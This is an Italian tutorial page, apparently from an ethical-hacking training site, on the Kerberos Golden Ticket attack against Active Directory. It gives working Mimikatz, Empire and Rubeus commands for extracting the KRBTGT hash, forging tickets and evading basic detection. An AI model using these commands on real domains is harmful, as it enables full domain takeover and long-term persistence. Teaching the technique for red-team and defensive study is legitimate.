Golden Ticket: Kerberos Ticket-Granting Ticket (T1558.001)

Il Golden Ticket rappresenta una delle tecniche più devastanti nell'arsenale degli attaccanti Active Directory. Questa metodologia sfrutta l'hash della password dell'account KRBTGT per forgiare ticket Kerberos TGT (Ticket-Granting Ticket) completamente validi per qualsiasi account del dominio.

L'attaccante che ottiene l'hash KRBTGT può generare materiale di autenticazione per impersonare qualsiasi utente, inclusi gli amministratori di dominio. Questa tecnica si colloca nella tattica TA0006 - Credential Access, dove l'obiettivo primario è il furto di credenziali per mantenere l'accesso persistente.

Il KRBTGT è l'account di servizio del Key Distribution Center (KDC) Kerberos, responsabile della firma e cifratura di tutti i ticket del dominio. Una volta compromesso, l'attaccante può generare ticket con durate arbitrarie e privilegi elevati. Un singolo gruppo APT ha utilizzato pubblicamente questa tecnica, mentre 4 software specializzati la implementano nativamente.

La generazione di un Golden Ticket richiede prima l'ottenimento dell'hash KRBTGT attraverso tecniche di credential dumping su un domain controller. Mimikatz rimane lo strumento principe per questa operazione.

Per estrarre l'hash KRBTGT dal domain controller compromesso: mimikatz # lsadump::dcsync /domain:victim.local /user:krbtgt

L'output fornirà l'hash NTLM necessario per la fase successiva. Con questo hash, puoi generare il Golden Ticket utilizzando il modulo kerberos di Mimikatz: mimikatz # kerberos::golden /domain:victim.local /sid:S-1-5-21-[...] /krbtgt:[HASH] /user:Administrator /id:500

Empire offre un'implementazione automatizzata attraverso il suo modulo Mimikatz integrato. La sintassi risulta più semplice per operazioni ripetute durante un red team engagement.

usemodule credentials/mimikatz/golden_ticket set Domain victim.local set CredID [ID] execute

Per ambienti Linux o cross-platform, Sliver incorpora il framework Rubeus permettendo manipolazioni avanzate dei ticket. La generazione avviene con: /rubeus golden /aes256:[HASH] /user:Administrator /domain:victim.local

Rubeus stesso offre opzioni granulari per personalizzare attributi del ticket come durata, SID history e gruppi. Questo permette di creare ticket più credibili che bypassano detection basiche: Rubeus.exe golden /rc4:[HASH] /domain:victim.local /sid:S-1-5-21-[...] /user:ServiceAccount /id:1105 /pgid:513 /groups:512,520,572

Una volta generato, il ticket viene iniettato nella sessione corrente permettendo l'accesso a qualsiasi risorsa del dominio. La persistenza può durare fino a 10 anni se non vengono implementate rotazioni dell'account KRBTGT.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.